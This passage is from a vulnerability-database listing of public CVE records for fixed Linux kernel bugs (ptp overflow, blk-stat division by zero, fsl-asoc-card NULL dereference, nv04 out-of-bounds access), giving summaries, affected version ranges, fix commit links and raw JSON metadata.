          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nptp: fix integer overflow in max_vclocks_store\n\nOn 32bit systems, the \"4 * max\" multiply can overflow.  Use kcalloc()\nto do the allocation to prevent this."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:19:35.031Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/4b03da87d0b7074c93d9662c6e1a8939f9b8b86e"
        },
        {
          "url": "https://git.kernel.org/stable/c/d50d62d5e6ee6aa03c00bddb91745d0b632d3b0f"
        },
        {
          "url": "https://git.kernel.org/stable/c/666e934d749e50a37f3796caaf843a605f115b6f"
        },
        {
          "url": "https://git.kernel.org/stable/c/e1fccfb4638ee6188377867f6015d0ce35764a8e"
        },
        {
          "url": "https://git.kernel.org/stable/c/81d23d2a24012e448f651e007fac2cfd20a45ce0"
        }
      ],
      "title": "ptp: fix integer overflow in max_vclocks_store",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40994",
    "datePublished": "2024-07-12T12:37:37.124Z",
    "dateReserved": "2024-07-12T12:17:45.606Z",
    "dateUpdated": "2025-11-03T21:58:58.171Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35925 (GCVE-0-2024-35925)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2026-01-05 10:35

Title

block: prevent division by zero in blk_rq_stat_sum()

Summary

In the Linux kernel, the following vulnerability has been resolved: block: prevent division by zero in blk_rq_stat_sum() The expression dst->nr_samples + src->nr_samples may have zero value on overflow. It is necessary to add a check to avoid division by zero. Found by Linux Verification Center (linuxtesting.org) with Svace.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/6a55dab4ac956deb2…
	https://git.kernel.org/stable/c/edd073c78d2bf48c5…
	https://git.kernel.org/stable/c/b0cb5564c3e8e0ee0…
	https://git.kernel.org/stable/c/21e7d72d0cfcbae60…
	https://git.kernel.org/stable/c/512a01da7134bac8f…
	https://git.kernel.org/stable/c/5f7fd6aa4c4877d77…
	https://git.kernel.org/stable/c/98ddf2604ade2d954…
	https://git.kernel.org/stable/c/93f52fbeaf4b676b2…

Impacted products

Vendor

Product

Version

Linux

Affected: eca8b53a6769e60d6d8240d71202d73b0af81901 , < 6a55dab4ac956deb23690eedd74e70b892a378e7 (git)
Affected: eca8b53a6769e60d6d8240d71202d73b0af81901 , < edd073c78d2bf48c5b8bf435bbc3d61d6e7c6c14 (git)
Affected: eca8b53a6769e60d6d8240d71202d73b0af81901 , < b0cb5564c3e8e0ee0a2d28c86fa7f02e82d64c3c (git)
Affected: eca8b53a6769e60d6d8240d71202d73b0af81901 , < 21e7d72d0cfcbae6042d498ea2e6f395311767f8 (git)
Affected: eca8b53a6769e60d6d8240d71202d73b0af81901 , < 512a01da7134bac8f8b373506011e8aaa3283854 (git)
Affected: eca8b53a6769e60d6d8240d71202d73b0af81901 , < 5f7fd6aa4c4877d77133ea86c14cf256f390b2fe (git)
Affected: eca8b53a6769e60d6d8240d71202d73b0af81901 , < 98ddf2604ade2d954bf5ec193600d5274a43fd68 (git)
Affected: eca8b53a6769e60d6d8240d71202d73b0af81901 , < 93f52fbeaf4b676b21acfe42a5152620e6770d02 (git)

Linux

Affected: 4.15
Unaffected: 0 , < 4.15 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35925",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T15:10:44.680403Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:55.338Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.052Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6a55dab4ac956deb23690eedd74e70b892a378e7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/edd073c78d2bf48c5b8bf435bbc3d61d6e7c6c14"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b0cb5564c3e8e0ee0a2d28c86fa7f02e82d64c3c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/21e7d72d0cfcbae6042d498ea2e6f395311767f8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/512a01da7134bac8f8b373506011e8aaa3283854"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5f7fd6aa4c4877d77133ea86c14cf256f390b2fe"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/98ddf2604ade2d954bf5ec193600d5274a43fd68"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/93f52fbeaf4b676b21acfe42a5152620e6770d02"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "block/blk-stat.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6a55dab4ac956deb23690eedd74e70b892a378e7",
              "status": "affected",
              "version": "eca8b53a6769e60d6d8240d71202d73b0af81901",
              "versionType": "git"
            },
            {
              "lessThan": "edd073c78d2bf48c5b8bf435bbc3d61d6e7c6c14",
              "status": "affected",
              "version": "eca8b53a6769e60d6d8240d71202d73b0af81901",
              "versionType": "git"
            },
            {
              "lessThan": "b0cb5564c3e8e0ee0a2d28c86fa7f02e82d64c3c",
              "status": "affected",
              "version": "eca8b53a6769e60d6d8240d71202d73b0af81901",
              "versionType": "git"
            },
            {
              "lessThan": "21e7d72d0cfcbae6042d498ea2e6f395311767f8",
              "status": "affected",
              "version": "eca8b53a6769e60d6d8240d71202d73b0af81901",
              "versionType": "git"
            },
            {
              "lessThan": "512a01da7134bac8f8b373506011e8aaa3283854",
              "status": "affected",
              "version": "eca8b53a6769e60d6d8240d71202d73b0af81901",
              "versionType": "git"
            },
            {
              "lessThan": "5f7fd6aa4c4877d77133ea86c14cf256f390b2fe",
              "status": "affected",
              "version": "eca8b53a6769e60d6d8240d71202d73b0af81901",
              "versionType": "git"
            },
            {
              "lessThan": "98ddf2604ade2d954bf5ec193600d5274a43fd68",
              "status": "affected",
              "version": "eca8b53a6769e60d6d8240d71202d73b0af81901",
              "versionType": "git"
            },
            {
              "lessThan": "93f52fbeaf4b676b21acfe42a5152620e6770d02",
              "status": "affected",
              "version": "eca8b53a6769e60d6d8240d71202d73b0af81901",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "block/blk-stat.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.15"
            },
            {
              "lessThan": "4.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: prevent division by zero in blk_rq_stat_sum()\n\nThe expression dst-\u003enr_samples + src-\u003enr_samples may\nhave zero value on overflow. It is necessary to add\na check to avoid division by zero.\n\nFound by Linux Verification Center (linuxtesting.org) with Svace."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:35:44.718Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/6a55dab4ac956deb23690eedd74e70b892a378e7"
        },
        {
          "url": "https://git.kernel.org/stable/c/edd073c78d2bf48c5b8bf435bbc3d61d6e7c6c14"
        },
        {
          "url": "https://git.kernel.org/stable/c/b0cb5564c3e8e0ee0a2d28c86fa7f02e82d64c3c"
        },
        {
          "url": "https://git.kernel.org/stable/c/21e7d72d0cfcbae6042d498ea2e6f395311767f8"
        },
        {
          "url": "https://git.kernel.org/stable/c/512a01da7134bac8f8b373506011e8aaa3283854"
        },
        {
          "url": "https://git.kernel.org/stable/c/5f7fd6aa4c4877d77133ea86c14cf256f390b2fe"
        },
        {
          "url": "https://git.kernel.org/stable/c/98ddf2604ade2d954bf5ec193600d5274a43fd68"
        },
        {
          "url": "https://git.kernel.org/stable/c/93f52fbeaf4b676b21acfe42a5152620e6770d02"
        }
      ],
      "title": "block: prevent division by zero in blk_rq_stat_sum()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35925",
    "datePublished": "2024-05-19T10:10:35.708Z",
    "dateReserved": "2024-05-17T13:50:33.126Z",
    "dateUpdated": "2026-01-05T10:35:44.718Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42089 (GCVE-0-2024-42089)

Vulnerability from cvelistv5 – Published: 2024-07-29 16:26 – Updated: 2025-11-03 22:01

Title

ASoC: fsl-asoc-card: set priv->pdev before using it

Summary

In the Linux kernel, the following vulnerability has been resolved: ASoC: fsl-asoc-card: set priv->pdev before using it priv->pdev pointer was set after being used in fsl_asoc_card_audmux_init(). Move this assignment at the start of the probe function, so sub-functions can correctly use pdev through priv. fsl_asoc_card_audmux_init() dereferences priv->pdev to get access to the dev struct, used with dev_err macros. As priv is zero-initialised, there would be a NULL pointer dereference. Note that if priv->dev is dereferenced before assignment but never used, for example if there is no error to be printed, the driver won't crash probably due to compiler optimisations.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ae81535ce2503aabc…
	https://git.kernel.org/stable/c/8896e18b7c366f8fa…
	https://git.kernel.org/stable/c/3662eb2170e59b58a…
	https://git.kernel.org/stable/c/544ab46b7ece6d6be…
	https://git.kernel.org/stable/c/8faf91e58425c2f6c…
	https://git.kernel.org/stable/c/29bc9e7c75398b0d1…
	https://git.kernel.org/stable/c/7c18b4d89ff9c810b…
	https://git.kernel.org/stable/c/90f3feb24172185f1…

Impacted products

Vendor

Product

Version

Linux

Affected: 708b4351f08c08ea93f773fb9197bdd3f3b08273 , < ae81535ce2503aabc4adab3472f4338070cdeb6a (git)
Affected: 708b4351f08c08ea93f773fb9197bdd3f3b08273 , < 8896e18b7c366f8faf9344abfd0971435f1c723a (git)
Affected: 708b4351f08c08ea93f773fb9197bdd3f3b08273 , < 3662eb2170e59b58ad479982dc1084889ba757b9 (git)
Affected: 708b4351f08c08ea93f773fb9197bdd3f3b08273 , < 544ab46b7ece6d6bebbdee5d5659c0a0f804a99a (git)
Affected: 708b4351f08c08ea93f773fb9197bdd3f3b08273 , < 8faf91e58425c2f6ce773250dfd995f1c2d461ac (git)
Affected: 708b4351f08c08ea93f773fb9197bdd3f3b08273 , < 29bc9e7c75398b0d12fc30955f2e9b2dd29ffaed (git)
Affected: 708b4351f08c08ea93f773fb9197bdd3f3b08273 , < 7c18b4d89ff9c810b6e562408afda5ce165c4ea6 (git)
Affected: 708b4351f08c08ea93f773fb9197bdd3f3b08273 , < 90f3feb24172185f1832636264943e8b5e289245 (git)

Linux

Affected: 3.18
Unaffected: 0 , < 3.18 (semver)
Unaffected: 4.19.317 , ≤ 4.19.* (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:21.638Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ae81535ce2503aabc4adab3472f4338070cdeb6a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8896e18b7c366f8faf9344abfd0971435f1c723a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3662eb2170e59b58ad479982dc1084889ba757b9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/544ab46b7ece6d6bebbdee5d5659c0a0f804a99a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8faf91e58425c2f6ce773250dfd995f1c2d461ac"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/29bc9e7c75398b0d12fc30955f2e9b2dd29ffaed"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7c18b4d89ff9c810b6e562408afda5ce165c4ea6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/90f3feb24172185f1832636264943e8b5e289245"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42089",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:18:44.318855Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:01.199Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "sound/soc/fsl/fsl-asoc-card.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ae81535ce2503aabc4adab3472f4338070cdeb6a",
              "status": "affected",
              "version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
              "versionType": "git"
            },
            {
              "lessThan": "8896e18b7c366f8faf9344abfd0971435f1c723a",
              "status": "affected",
              "version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
              "versionType": "git"
            },
            {
              "lessThan": "3662eb2170e59b58ad479982dc1084889ba757b9",
              "status": "affected",
              "version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
              "versionType": "git"
            },
            {
              "lessThan": "544ab46b7ece6d6bebbdee5d5659c0a0f804a99a",
              "status": "affected",
              "version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
              "versionType": "git"
            },
            {
              "lessThan": "8faf91e58425c2f6ce773250dfd995f1c2d461ac",
              "status": "affected",
              "version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
              "versionType": "git"
            },
            {
              "lessThan": "29bc9e7c75398b0d12fc30955f2e9b2dd29ffaed",
              "status": "affected",
              "version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
              "versionType": "git"
            },
            {
              "lessThan": "7c18b4d89ff9c810b6e562408afda5ce165c4ea6",
              "status": "affected",
              "version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
              "versionType": "git"
            },
            {
              "lessThan": "90f3feb24172185f1832636264943e8b5e289245",
              "status": "affected",
              "version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "sound/soc/fsl/fsl-asoc-card.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.18"
            },
            {
              "lessThan": "3.18",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.317",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.317",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: fsl-asoc-card: set priv-\u003epdev before using it\n\npriv-\u003epdev pointer was set after being used in\nfsl_asoc_card_audmux_init().\nMove this assignment at the start of the probe function, so\nsub-functions can correctly use pdev through priv.\n\nfsl_asoc_card_audmux_init() dereferences priv-\u003epdev to get access to the\ndev struct, used with dev_err macros.\nAs priv is zero-initialised, there would be a NULL pointer dereference.\nNote that if priv-\u003edev is dereferenced before assignment but never used,\nfor example if there is no error to be printed, the driver won\u0027t crash\nprobably due to compiler optimisations."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:22:45.521Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ae81535ce2503aabc4adab3472f4338070cdeb6a"
        },
        {
          "url": "https://git.kernel.org/stable/c/8896e18b7c366f8faf9344abfd0971435f1c723a"
        },
        {
          "url": "https://git.kernel.org/stable/c/3662eb2170e59b58ad479982dc1084889ba757b9"
        },
        {
          "url": "https://git.kernel.org/stable/c/544ab46b7ece6d6bebbdee5d5659c0a0f804a99a"
        },
        {
          "url": "https://git.kernel.org/stable/c/8faf91e58425c2f6ce773250dfd995f1c2d461ac"
        },
        {
          "url": "https://git.kernel.org/stable/c/29bc9e7c75398b0d12fc30955f2e9b2dd29ffaed"
        },
        {
          "url": "https://git.kernel.org/stable/c/7c18b4d89ff9c810b6e562408afda5ce165c4ea6"
        },
        {
          "url": "https://git.kernel.org/stable/c/90f3feb24172185f1832636264943e8b5e289245"
        }
      ],
      "title": "ASoC: fsl-asoc-card: set priv-\u003epdev before using it",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42089",
    "datePublished": "2024-07-29T16:26:29.288Z",
    "dateReserved": "2024-07-29T15:50:41.171Z",
    "dateUpdated": "2025-11-03T22:01:21.638Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-27008 (GCVE-0-2024-27008)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:29 – Updated: 2025-11-04 17:16

Title

drm: nv04: Fix out of bounds access

Summary

In the Linux kernel, the following vulnerability has been resolved: drm: nv04: Fix out of bounds access When Output Resource (dcb->or) value is assigned in fabricate_dcb_output(), there may be out of bounds access to dac_users array in case dcb->or is zero because ffs(dcb->or) is used as index there. The 'or' argument of fabricate_dcb_output() must be interpreted as a number of bit to set, not value. Utilize macros from 'enum nouveau_or' in calls instead of hardcoding. Found by Linux Verification Center (linuxtesting.org) with SVACE.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/c2b97f26f081ceec3…
	https://git.kernel.org/stable/c/5050ae879a828d752…
	https://git.kernel.org/stable/c/097c7918fcfa1dee2…
	https://git.kernel.org/stable/c/df0991da7db846f7f…
	https://git.kernel.org/stable/c/5fd4b090304e450aa…
	https://git.kernel.org/stable/c/6690cc2732e2a8d0e…
	https://git.kernel.org/stable/c/26212da39ee14a52c…
	https://git.kernel.org/stable/c/cf92bb778eda7830e…

Impacted products

Vendor

Product

Version

Linux

Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < c2b97f26f081ceec3298151481687071075a25cb (git)
Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < 5050ae879a828d752b439e3827aac126709da6d1 (git)
Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < 097c7918fcfa1dee233acfd1f3029f00c3bc8062 (git)
Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < df0991da7db846f7fa4ec6740350f743d3b69b04 (git)
Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < 5fd4b090304e450aa0e7cc9cc2b4873285c6face (git)
Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < 6690cc2732e2a8d0eaca44dcbac032a4b0148042 (git)
Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < 26212da39ee14a52c76a202c6ae5153a84f579a5 (git)
Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < cf92bb778eda7830e79452c6917efa8474a30c1e (git)

Linux

Affected: 2.6.38
Unaffected: 0 , < 2.6.38 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.157 , ≤ 5.15.* (semver)
Unaffected: 6.1.88 , ≤ 6.1.* (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27008",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T17:53:02.936582Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:46:47.615Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:16:46.306Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c2b97f26f081ceec3298151481687071075a25cb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5050ae879a828d752b439e3827aac126709da6d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/097c7918fcfa1dee233acfd1f3029f00c3bc8062"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/df0991da7db846f7fa4ec6740350f743d3b69b04"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5fd4b090304e450aa0e7cc9cc2b4873285c6face"
          },
          {
            "tags": [
              "x_transferred"
            ],
